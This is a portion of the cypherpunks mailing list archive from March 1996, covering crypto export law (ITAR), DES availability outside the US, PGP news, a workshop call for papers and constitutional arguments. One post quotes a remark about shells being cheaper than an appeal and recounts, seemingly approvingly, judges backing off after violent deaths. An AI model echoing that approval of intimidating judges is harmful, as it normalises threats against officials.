You wouldn't be jailed, since as far as I know, it's perfectly legal for
you to use DES. It's just illegal for anyone in the US or Canada to give
it to you.

It's possible that some NAFTA working group has written regulations to
make Mexico answerable for ITAR violations, but I seriously doubt it.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 27 Mar 1996 14:50:27 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why NSA is afraid that ITARs will be thrown out in court
In-Reply-To: <ad7cd9f50d021004b7ef@[205.199.118.202]>
Message-ID: <199603262136.NAA17319@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM
>Whether this NSA paranoia has anything to do with the final decision on the
>Zimmermann et. al. matter is unclear, but it is likely that a very strong
>challenge to the ITARs--maybe the appeal by Phil Karn is such a challenge,
>maybe the Bernstein case--will result in big chunks of the ITARs being
>thrown out.

regarding these discussions about challenging the ITAR, I think it
would have to be done by some really daring lawyers. there are some
precedents for judges slapping secrecy orders on various aspects of
the trial whenever the NSA is involved-- just another way the NSA
loves to manipulate our government system via a technique that might
be called "shadow puppetry" <g>

the case then dies a slow painful death of attrition in the dark.

anyway, one would have to somehow intersect with a judge that
is not easily intimiated by "national security" issues. I am dead
serious- -the first thing NSA or "intelligence agency" lawyers do
is try to impress the judge that this is an unusual case that
requires strict secrecy in the interests of national security.

 having brave
lawyers might mean they are willing to defy secrecy orders about the
trial to publicize it in the open to win public attention and support.
 I think this would be difficult. but one has to try.

there is a simple formula to fighting the NSA and their horrible
tactics: disclosure can be a powerful weapon in our favor. the
NSA will usually back down from a confrontation instead of escalating
it. public exposure is their absolute worst nightmare. there are
a lot of spooks in the NSA who cringe every time those initials are
used. well,

NSA NSA NSA NSA NSA NSA NSA NSA!!!

(maybe I can actually get a few of them to have heart attacks by saying
that)

again, I continue to believe that the main problem with the NSA/ITAR
is not so much that either exists, but that everyone in our country
is following both as if they are the rule of law.

you get more of what you roll over for.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 27 Mar 1996 14:48:02 +0800
To: cypherpunks@toad.com
Subject: Call for Papers: Internet Privacy and Security
Message-ID: <01I2SPYPHUVS8ZDZ7I@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sorry if this has been on here before.
	-Allen

From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Tue, 19 Mar 96 12:09:20 PST
From: RISKS List Owner <risko@csl.sri.com>
Subject: RISKS DIGEST 17.91

RISKS-LIST: Risks-Forum Digest  Tuesday 19 March 1996  Volume 17 : Issue 91

----------------------------------------------------------------------

Date: Fri, 15 Mar 1996 12:17:23 -0500
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Subject: Internet Privacy and Security, Call for Papers

                      CALL FOR PAPERS
           INTERNET PRIVACY AND SECURITY WORKSHOP
                   Haystack Observatory, MA
                      May 20-21, 1996
              Privacy and Security Working Group
                   Federal Networking Council
            Research Program on Communications Policy
    Center for Technology, Policy, and Industrial Development
              Massachusetts Institute of Technology

INVITATION

The Privacy and Security Working Group (PSWG) of the Federal Networking
Council (FNC) and the Research Program on Communications Policy of the
Center for Technology, Policy, and Industrial Development at the
Massachusetts Institute of Technology will hold an invitational workshop at
the Haystack Observatory outside of Boston, MA, on May 20-21, 1996. This
workshop is intended to bring Federal, academic and private sector
participants together in collaboration to develop strategies and potential
solutions related to Internet privacy and security.

Though a principal focus of the workshop will be on the Federal portion of
the Internet, the FNC recognizes that the Federal Internet is tightly
coupled with the Global Internet, whose security policies, practices, and
goals are complementary to those of the Federal Government. To define those
practices, procedures and goals, the PSWG has undertaken two major
initiatives:

- The Federal Internet Security Plan (FISP), which was developed as a
  scalable, continual improvement process, based on common principles 
  and mechanisms compatible with Internet community values and needs; and

- The Collaborations in Internet Security (CIS) project, an effort aimed
  at testing the strength of agency approaches to security and moving these
  technologies beyond individual agency networking environments and into
  both inter-agency and agency-commercial sector communications. The CIS
  will result in the development of a new and sustainable process for
  developing, integrating, and deploying security technologies that are
  interoperable at all levels of the Federal government and within the  
  commercial and academic sectors.

These initiatives are intended to highlight the critical interface between
Federal and commercial users and developers of Internet services and
technologies.

OBJECTIVES

This workshop will bring together principal players in the Federal  
and overall Internet community to discuss the problems and  
challenges of privacy and security on the Internet, and will:

- Identify critical issues, requirements, and recommendations related 
  to future Internet privacy and security research and development efforts;

- Describe "best practice" approaches to Internet privacy and security;

- Develop specific strategies for implementing Internet Security programs
  involving all sectors of the Internet community;

- Extend the Federal Internet Security Plan (FISP) by defining specific 
  implementations; and finally,

- Develop specific strategies for the migration of technologies from the
  individual RFC unit test stage to the integration of a complete functional
  managed system in the CIS test/demonstration/pilot projects.

SUBMISSIONS

Abstracts or complete paper drafts related to the topics listed  
above are welcome.  Accepted papers will be a part of the published  
record of the workshop.  All points of view on Federal policies  
affecting Internet privacy and security are welcome. Please make  
all electronic submissions in ASCII format.

For further information or to submit an abstract or paper contact:

     Internet Security and Privacy Workshop c/o Joseph Reagle
     Research Program on Communications Policy
     Massachusetts Institute of Technology
     One Amherst St. (E40-218)
     Cambridge, MA 02139
     Voice: (617) 253-4138.
     Fax:   (617) 253-7326
     papers@rpcp.mit.edu

SCHEDULE and DEADLINES

Call for papers - March 14, 1996
Abstracts Due   - April 14, 1996
Invitations to Participants - April 20, 1996
Revised/Completed papers due - May 19, 1996
Workshop - May 20-21, 1996

PARTICIPANTS

Participation in the workshop is by invitation, based primarily on  
submitted papers and abstracts.  Additional individuals may be  
invited to ensure that participation reflects a broad cross-section  
of the Internet community.

PROGRAM COMMITTEE

Dennis Branstad - Trusted Information Systems (TIS)
Rich Pethia - Computer Emergency Response Team (CERT)
Jeffrey Schiller - Massachusetts Institute of Technology (MIT)
Richard Solomon - Massachusetts Institute of Technology (MIT)
Rick Stevens - Department of Energy /Argonne National Labs (DOE)

STEERING COMMITTEE

Stephen Squires, DARPA (FNC/PSWG Co-Chair)
Dennis Steinauer, NIST (FNC/PSWG Co-Chair)
Tice DeYoung, NASA
Phillip Dykstra, Army Research Laboratory (ARL)
Mike Green, NSA
George Seweryniak, Department of Energy (DOE)
Walter Wiebe, Federal Networking Council (FNC)
                                                         
BACKGROUND

Federal Internet Security Plan: In September 1995, the PSWG published the
draft Federal Internet Security Plan (FISP).  The FISP is oriented toward a
scalable, continual improvement process, based on common principles and
mechanisms compatible with Internet community values and needs.  See
<http://www.fnc.gov/SWG.html>.  The plan addresses Internet security
requirements, including interoperability, from the perspective of the goals
and objectives outlined in the National Performance Review (NPR),
http://www.npr.gov/.  The Federal Networking Council developed this
framework in conjunction with its Advisory Committee which represents
industry, academia, and non-profit sectors.

Action Items, from the FISP, to be addressed during the Workshop:

Internet Security Policy and Policy Support Activities

* Establish overall Internet security policies
* Address security in all Federally supported NII pilots
* Coordinate Internet community involvement
* Establish an ongoing Internet threat database and assessment capability
* Identify legal and law enforcement issues

Internet Security and Technology Development

* Develop an Internet security maturity model
* Develop Internet security architecture
* Enhance Internet security services and protocols
* Develop a "Secure-Out-of-the-Box" endorsement
* Enhance application security

Internet Security Infrastructure

* Establish a set of Internet security interoperability testbeds
* Support privacy, authentication, certificate, and security services pilots
* Establish Internet security testing and evaluation capabilities
* Improve security incident handling capabilities
* Develop security self-assessment capabilities
* Establish effective secure software and document distribution mechanisms

Education and Awareness

* Compile Internet user and site profiles
* Encourage use of available security technologies
* Establish an Internet security information server
* Establish an Internet security symposium/workshop series
* Establish an Internet security fellowship program

Collaborations in Internet Security: With the Federal government's
ever-increasing dependency on computers and distributed systems, there is
great urgency for it to develop and employ enhanced information system
security technologies and practices. At the same time, these Federal
technologies must interoperate with those of the broader Internet community
(encompassing the private and academic sectors, along with the Federal
sector).

In recognition of these needs, the Federal Networking Council's Privacy &
Security Working Group (FNC/PSWG) has been awarded a National Performance
Review (NPR) Innovation Fund grant to compare and validate agency approaches
to security. This Collaborations in Internet Security (CIS) project aims to
test the strength of these technologies beyond individual agency networking
environments, emphasizing the inter-agency and agency-commercial sector
communications. The CIS will result in the development of a new and
sustainable process for developing, integrating, and deploying security
technology that is interoperable at all levels of the Federal Government and
within the commercial and academic sectors.

The governing principles behind the Security Testbeds include: employment of
an open process (with the activities and results open to participation and
comment by both public and private sector participants); a focus on
multivendor technologies; an emphasis on testing and experimentally
deploying security technologies emerging from research and private sectors
as well as security technologies currently in use in the commercial
environment; and an underlying objective to ensure interoperability among
the broad Internet community (federal, private, and academic). Initial tests
will include demonstrations of Kerberos v.5, testing of single-use
passwords, and digital signatures.  For more information, please see
(http://www.fnc.gov/cis_page.html)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RUSSELLDH@aol.com (by way of "David E. Smith" <RUSSELLDH@aol.com>)
Date: Wed, 27 Mar 1996 15:04:38 +0800
To: cypherpunks@toad.com
Subject: Phil Zimmermann Interview online...
Message-ID: <2.2.32.19960326202110.006a53c0@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


I don't recall seeing this previously on the list.  The interview
itself is pretty lightweight - intended for a rather broad
audience - but it's the sort of thing we could use more of (that
is, good positive pro-crypto publicity).

original message goes here --->

Hi!
On February 2nd, 1996 I interviewed Phil Zimmermann and have transcribed that
interview and placed it on the Web.  It is located at:

http://www.animatedsoftware.com/hightech/philspgp.htm

I hope you find it interesting. If you would like to add a link to it please
let us know.  By the way, I enjoyed visiting your home page, where I got your
email address.

Thanks,
Russell Hoffman
http://www.animatedsoftware.com


--- David Smith, Intellecutal Terrorist
http://www.midwest.net/scribers/dsmith/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Victor Ramon Aguilar Ocampo <aguilar@servidor.dgsca.unam.mx>
Date: Wed, 27 Mar 1996 14:48:46 +0800
To: cypherpunks@toad.com
Subject: About Triple DES ......
Message-ID: <Pine.SV4.3.91.960326141838.9870D-100000@servidor>
MIME-Version: 1.0
Content-Type: text/plain



Hello:

   Please let me know if TRIPLE DES is regulated by the same rules than 
the others criptography systems in USA.

   We want to use it here in National Autonomous University of Mexico, so 
we don't want to get jailed.

   In case we can use it somebody knows where can i get the source code ??

   I have searched this already in WWW, archie and Veronica.

Thanks in advance.




----------------------------------------------------------------
                  Academic Computing Services      
            National Autonomus University of Mexico

     
   Victor Ramon Aguilar Ocampo
   Coordinacion de Servicios de Computo
   DGSCA - UNAM
   E-mail:     aguilar@servidor.unam.mx


   " Solo tienes dos cosas en tu hacer, las Razones y 
     los Resultados. Las Razones no cuentan  ".

----------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Wed, 27 Mar 1996 03:52:51 +0800
To: kermie@paonline.com (Dan Ringley)
Subject: Re: DESCRIBE
In-Reply-To: <v05000500ad7dabd636ba@[198.69.90.213]>
Message-ID: <19960326143045.26906.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Dan Ringley writes:
 > Take me off of the God Forbidden list already! Now!

Sorry, Dan, I can't do that.  Fortunately for you, however,
cypherpunks-request@toad.com can.

Mailing list requests NEVER go to the list, always to the list
manager, be it the LIST-request address or majordomo or listserv.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | If you would seek peace, 
Potsdam, NY 13676 | +1 315 268 9201 FAX   | first seek freedom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 27 Mar 1996 15:04:57 +0800
To: geeman@best.com
Subject: Re: Pepsi World - Gotta Have It!
Message-ID: <2.2.32.19960326230523.0095a474@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:14 AM 3/26/96 -0800, geeman@best.com wrote:
>hoax, I presume?

Not a hoax.  On occasion people signup on various web sites requiring a
username and password with this list name as the e-mail contact and the user
ID and password as "cypherpunk".  Because of that, occasionally spam from
such accounts shows up here, adding to the noise level.

I find it annoying, but I just filter it and go on with my life.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 27 Mar 1996 16:22:37 +0800
To: Victor Ramon Aguilar Ocampo <aguilar@servidor.dgsca.unam.mx>
Subject: Re: About Triple DES ......
In-Reply-To: <Pine.SV4.3.91.960326141838.9870D-100000@servidor>
Message-ID: <199603262114.QAA13464@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Victor Ramon Aguilar Ocampo writes:
>    Please let me know if TRIPLE DES is regulated by the same rules than 
> the others criptography systems in USA.

Yes.

>    We want to use it here in National Autonomous University of Mexico, so 
> we don't want to get jailed.

You are in Mexico. You aren't required to follow U.S. law.

> In case we can use it somebody knows where can i get the source code ??

Try the International Cryptography Home page to help you find a copy
from outside the U.S.

http://www.cs.hut.fi/crypto/

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C. Peponis" <peponmc@Fe3.rust.net>
Date: Wed, 27 Mar 1996 14:46:35 +0800
To: cypherpunks@toad.com
Subject: Re: Let's *NOT* "Raise their Awareness"
Message-ID: <199603262308.SAA27360@Fe3.rust.net>
MIME-Version: 1.0
Content-Type: text/plain


On  Tue, 26 Mar 1996 , David K. Merriman wrote:
       


>Regrettably, I must disagree with Mr. May on the matter of speaking
>in whatever language one chooses. It seems that here in Texas
>(specifically, here in Amarillo), a local judge informed a Hispanic
>family that they were prohibited from speaking _only_ Spanish to
>their child at home. The rationale was that since English is the
>(ostensibly, in this area) Public Language of the school system here,
>failure to encourage use of English would adversely impact the
>child's education, and was thus a form of child abuse. If need be, I
>can provide excerpts from the local snoozepapers coverage of the
>issue.

The judge is correct in this matter, most people view it from the 
rights of the parents, but what about the child who, because of 
his/her parents egotism and ignorance, grows up not being able to 
compete effectivly?

My rights, even parental rights, end when their exersize directly 
impact someone else(the child) in a negative way.

Regards,
Michael Peponis
PGP Key Available for MIT KeyServer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chuck McManis <cmcmanis@netcom.com>
Date: Wed, 27 Mar 1996 16:57:37 +0800
To: "'Mutatis Mutantdis'" <wlkngowl@unix.asb.com>
Subject: RE: Noise Sphere in Java
Message-ID: <01BB1B40.136EB560@Inverness>
MIME-Version: 1.0
Content-Type: text/plain


 
Thanks to the post in C++ we now have a version of the Noise Sphere
program in Java. You can see it at:
	http://www.golfweb.com/cmcmanis/noise.html
The source is online as well. It currently plots the randomness of the
java.util.Random class. Modification for other classes that generate
random data should be easy, as long as the class has a method
nextInt() which returns a new random number. Other hacks are possible,
feel free to hack away at your leisure.

--Chuck McManis
cmcmanis@golfweb.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 27 Mar 1996 19:34:28 +0800
To: cypherpunks@toad.com
Subject: ViaCrypt PGP 4.0 for Windows shipping
Message-ID: <2.2.32.19960327060017.0090a994@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I have not seen this here yet, so sorry if you have seen it...

ViaCrypt is claiming that they are now shipping the Windows version of their
PGP 4.0.  (I tend to not believe marketing claims until I hear from people
who actually have it.)

Does anyone know if there are plans for this version to be interoperable
with PGP 3.0?

Furthermore, has anyone tried the new version?
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Wed, 27 Mar 1996 15:04:19 +0800
To: bholiday@trader.tlx.net (Bholiday)
Subject: Crypto CD UpDate
Message-ID: <21443.9603262216@sirius.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



The idea of putting together a CD with crypto stuff is an excellent
IDEA, and one which I very much welcome.

However a question .. are you (Ben) located in the US?  If so...

that rules out overseas buyers unless you fancy messing with ITAR...
Is it possible that you could come to some arrangement with some one
outside the ITAR fence who has a CD writer (any one reading have one?)
put together the same CD for those outside the US?

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 27 Mar 1996 20:06:47 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199603270702.XAA03401@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 PM 3/26/96 GMT, aba@atlas.ex.ac.uk wrote:
> ie I would have thought that getting rid of ITAR would be beneficial
> to internet commerce in general, and likely advance uptake of
> electronic cash (by several years?)  For whatever reasons (best known
> to themselves) even big fish like netscape, and microsoft don't seem
> to have any stomach for taking on the USG in any meaningful way over
> the issue.

If the Leahy bill got rid of ITAR, then that would be a very great
advance.  It is far from clear that it does get rid of ITAR.

If it was interpreted in a reasonable manner, then indeed it would
get rid of ITAR.  But if ITAR was interpreted in a reasonable manner,
then that also would get rid of ITAR
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 27 Mar 1996 20:07:12 +0800
To: jimbell@pacifier.com>
Subject: Re: Bad news from Judge Richey
Message-ID: <199603270702.XAA03403@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:16 PM 3/26/96 -0800, Timothy C. May wrote:
>I read your article as essentially saying:
>
>"Judges ought to remember that a box of shells costs a lot less than an
appeal."

In a family law case a few years ago, (I am afraid I cannot give the 
citation) a man with a well known tendency to violence suffered some
remarkably unjust decisions.  Some people involved in these cases met 
violent deaths.  Their cars exploded, etc.  Suddenly it became 
impossible to enforce previous family court judgements against this 
man because judges refused to hear the case.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olmur@dwarf.bb.bawue.de (Olmur)
Date: Wed, 27 Mar 1996 15:43:02 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: ITAR double standards?
In-Reply-To: <ad7ca1f6050210049009@[205.199.118.202]>
Message-ID: <m0u1gUb-0006DbC@dwarf>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "TCM" == Timothy C May <tcmay@got.net> writes:

[much deleted]

TCM> Now when I was with Intel, we made many of our chips in plants in
TCM> Ireland, Israel, and other locales outside the U.S. Some of these
TCM> chips were forbidden for export by the ITARs. And certainly the
TCM> knowledge of the engineers sent overseas was comparable to the
TCM> knowledge of RSA programmers....


Don't know about Intel, but IBM has an agreement with US-legislation,
that we can ship code, hardware and knowledge freely between all of
our locations.  An export-licence is only required when code/hardware
leaves the IBM-corporation.

Technically IBM-Germany is a _German_ company, so that ITAR would not
effect IBM-Germany.  However, the agreement between IBM-corporation
and US-legislation does have the desired effect (desired by US-legislation).


This seems to be the way how ITAR is enforced with multinational
corporations: they allow the very valuable exchange of knowledge, for
the prize of the corporation as a whole `voluntarily' obeying ITAR.


Of course all the usual disclaimers apply, ie I'm not a lawyer, don't
speak for IBM and the weather is not my fault either....


Have a nice day!
Olmur

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMVhkfg9NARnYm1I1AQGuGAP/XXDIIwrm/a0MRe5DgTtPcoo1Z2nJvSjj
KbmP0khSSv/5ekfmGlIVe4tOakCQo5Sp1GUfkxxnQdkuM2oTNCTU1nCFP3pj+J69
LX8Jjz1Z8c1UGyAWhBGYrKHbcdbeWoWfeanzx2uwVex0Nm1R3xN+et8Q/pmVKQTE
3FmGqOmHLk0=
=RZEo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Wed, 27 Mar 1996 18:08:04 +0800
To: cypherpunks@toad.com
Subject: trouble with idea.c from cryptl99.zip
Message-ID: <3158BD34.2AD8@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


Hey, I downloaded the crypto lib 'cryptl99.zip' from one of the crypto 
web sites, I got IDEA.C to compile, but it doesn't seem to encrypt.  
The test code that comes with it shows the sub-key groupings, then it 
does this

X 0 1 2 3 4 5 6 7
Y 0 1 2 3 4 5 6 7
Z 0 1 2 3 4 5 6 7


It looks like X should be the plaintext, Y the ciphertext, then Z the 
plaintext again from the code, but it isn't working.  If anyone knows 
the source code I am talking about let me know what is wrong. Here is 
what the main piece looks like:

printf("\n Encrypting %d bytes (%ld blocks)...", BLOCKS*16, BLOCKS);
	fflush(stdout);
	start = clock();
	memcpy(YY, XX, 8);
	for (l = 0; l < BLOCKS; l++)
		ideaCipher(YY, YY, EK);	/* repeated encryption */
	memcpy(ZZ, YY, 8);
	for (l = 0; l < BLOCKS; l++)
		ideaCipher(ZZ, ZZ, DK);	/* repeated decryption */
	end = clock() - start;
	l = end  / (CLOCKS_PER_SEC/1000) + 1;
	i = l/1000;
	j = l%1000;
	l =  4;             // (16 * BLOCKS * (CLOCKS_PER_SEC/1000)) / 
(end/1000);
	printf("%d.%03d seconds = %ld bytes per second\n", i, j, l);

	printf("\nX %3u  %3u  %3u  %3u  %3u  %3u  %3u %3u\n",
	  XX[0], XX[1],  XX[2], XX[3], XX[4], XX[5],  XX[6], XX[7]);
	printf("\nY %3u  %3u  %3u  %3u  %3u  %3u  %3u %3u\n",
	  YY[0], YY[1],  YY[2], YY[3], YY[4], YY[5],  YY[6], YY[7]);
	printf("\nZ %3u  %3u  %3u  %3u  %3u  %3u  %3u %3u\n",    
	  ZZ[0], ZZ[1],  ZZ[2], ZZ[3], ZZ[4], ZZ[5],  ZZ[6], ZZ[7]);


from this, Y should be encrypted, but it isn't! Thanks in advance for 
any help.
-- 
 thecrow@iconn.net
"It can't rain all the time"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@connobj.com>
Date: Wed, 27 Mar 1996 18:38:25 +0800
To: "Michael C. Peponis" <cypherpunks@toad.com
Subject: Re: Let's *NOT* "Raise their Awareness"
Message-ID: <2.2.32.19960327042730.00737020@mail.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 18:07 03.26.1996 -5:00, Michael C. Peponis wrote:
>On  Tue, 26 Mar 1996 , David K. Merriman wrote:
>>Regrettably, I must disagree with Mr. May on the matter of speaking
>>in whatever language one chooses. It seems that here in Texas
>>(specifically, here in Amarillo), a local judge informed a Hispanic
>>family that they were prohibited from speaking _only_ Spanish to
>>their child at home. The rationale was that since English is the
>>(ostensibly, in this area) Public Language of the school system here,
>>failure to encourage use of English would adversely impact the
>>child's education, and was thus a form of child abuse. If need be, I
>>can provide excerpts from the local snoozepapers coverage of the
>>issue.
>
>The judge is correct in this matter, most people view it from the 
>rights of the parents, but what about the child who, because of 
>his/her parents egotism and ignorance, grows up not being able to 
>compete effectivly?
>
>My rights, even parental rights, end when their exersize directly 
>impact someone else(the child) in a negative way.

Gee, that's funny.  I grew up in a household where we always spoke only
German, and not only that but I had to write one page of German daily to
keep my writing skills up; I was fluent in it at three.  I grew up in a
neighbourhood where we always spoke English; I was fluent in it at four.  I
grew up in a school system that offered me French immersion for about six
years, so for several years most of my classes were in French only; I was
fluent in it at fifteen.  I now speak and write all three languages (though
I'm most fluent in English and the French is rusty).  I was born in Canada
and have lived here all my life; I don't see the problem.

PMFJI the middle of this, but assuming the above account wasn't taken out of
context it seems awfully ludicrous to me.  Just MHO, of course.  I've never
yet seen a child who can't pick up a language common in the area just by
being around people who speak it... especially if it's the language used and
taught in school!  I have friends who've come from countries in Africa where
there are many tribal groups in addition to the widely-used official French
and English languages, and I was impressed when I saw these teenagers come
over here already fluent in five or six languages... until I was told that's
normal where they come from and everyone knows at least four just to get
around from day to day.  It boggles the mind to think that speaking one
language at home exclusively would have any sort of impact on a child's
development, AFAICS.

To state a REALLY controversial opinion: I've always felt one reason many
kids are so bored with school is that our school systems just plain don't
challenge them, and I'm afraid I see the above as a perfect example of
swaddling and coddling.  Kids are amazing and are guaranteed to surprise
you, when someone takes the time to work with them and set them achievable
goals.

If you'll excuse a European joke: "Q: What does a European call someone who
speaks four languages?  A: Gifted.  Q: Three languages?  A: Bright.  Q: Two
languages?  A: Normal.  Q: One language?  A: American." :-)  (No, this isn't
a snub, it's just meant in good humour; it applies to a lot of us Canucks
too even though we do have two official languages.  Heck, I apply it to
myself; my French is rusty, I haven't used it in over 12 years.)

---
Herb P. Sutter                            Current Network Technologies Corp.
Senior Architect, Distributed Computing   2655 Benedet, Mississauga ON Canada
Cell 416-618-0184                         Tel 416-805-9088   Fax 905-855-7194





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 27 Mar 1996 20:54:32 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u1pwx-000915C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:26 PM 3/25/96 -0800, Timothy C. May wrote:
>At 1:21 AM 3/26/96, jim bell wrote:

>IANACS (I am not a Constitutional scholar), but it is clear that the
>Constitution, being a relatively short document, is a _framework_, a kind
>of "generator," for establishing additional legislation. This is, obviously
>enough, why there is _legislative branch_, after all.
>
>Jim's argument (?) could be turned in all sorts of ways: "Your Honor, there
>is nothing I can find in the Constitution that says I can't drive on the
>left side of the road at 125 miles per hour." Indeed, there is nothing
>laying out detailed traffic laws. And so on.

OTOH, there is much precedent for being able to conclude that a
long-established practice is simply unconstitutional.  To name just a single 
example, suffragist Susan B. Anthony insisted in  1872 on the right to 
vote, arguing that the Constitution guaranteed all citizens that right, and 
women were citizens too. Both premises were correct; In hindsight, the issue 
was whether or not they were considered together or merely separately.   
Nevertheless, it took the 19th amendment passed in 1920 to "grant" this 
right to women.

Although my MCP (male chauvenist pig) credentials are at least as good as most, 
but not only did she have a point, she was absolutely correct.  Despite 80+ 
years of contrary history, nothing within the Constitution could be 
interpreted as excluding women from voting.  It was merely the practice of 
the day to do so.  That practice COULD HAVE been changed without itself 
violating the Constitution; at least in theory the 20th amendment wasn't 
necessary.  The fact that an amendment was the way the practice was 
changed shows that people will attempt to use the Constitution to justify 
practices which can't genuinely be supported there.  The lesson to be 
learned from this is that "our" government does some things entirely without 
regard to the wording of the Constitution, which may later be recognized as 
wrong by later, more civilized times.

For an example that has not yet been legally recognized, the Constitution 
prohibits "involuntary servitude," but until a couple of decades ago the 
military draft was in force.  Challenges to the draft on that basis have 
never been recognized, despite the fact that the draft is one of the most 
obvious examples of "involuntary servitude" that there is.


>That the Fifth Amendment attempts to make it clear that a defendant shall
>not be compelled to give testimony which may tend toincriminate himself
>(lotsa gotchas, as expected) clearly--to me if not to Jim Bell--implies
>that a "legal system" involving testimony, search warrants, subpoenas,
>juries, verdicts, appeals, etc., is implied by various parts of the
>Constitution.

It is, however, far more strongly "implied" by current practice than by any 
black-letter Constitutional provisions.  The difficulty is separating 
_Constitutional_ justification from "Well, that's the way we've always done 
it, so it MUST be okay!"  It's too bad that many people can't see the 
difference.


>(I could search one of the many online copies of the Big C for details, but
>I'm sure you all, except perhaps Jim, get it.)
>
>I'm no apologist for Big Government, of course, so I think we have vastly
>too many laws in the U.S. But I don't think naive arguments saying that a
>court cannot call witnesses by due process because the Constitution does
>not specifically have a clause saying this is the case is going to be very
>helpful or persuasive.

They just recently repealed the national 55 MPH speed limit.  Even though it 
was repealed by law, in the same way it was passed, plenty of people have 
argued that the Federal government has no jurisdiction in this area.  Those 
arguments are absolutely valid, even if they were ignored.  The danger in 
giving the government implicit authority in areas not mentioned in the 
Constitution is that it is not clear how far such justification extends.  If 
the government can limit us to 55, then why can't they limit us to 40-bit keys?

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 27 Mar 1996 20:59:47 +0800
To: Victor Ramon Aguilar Ocampo <aguilar@servidor.dgsca.unam.mx>
Subject: Re: About Triple DES ......
Message-ID: <199603270836.AAA20254@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:24 PM 3/26/96 -0600, you wrote:
>   Please let me know if TRIPLE DES is regulated by the same rules than 
>the others criptography systems in USA.
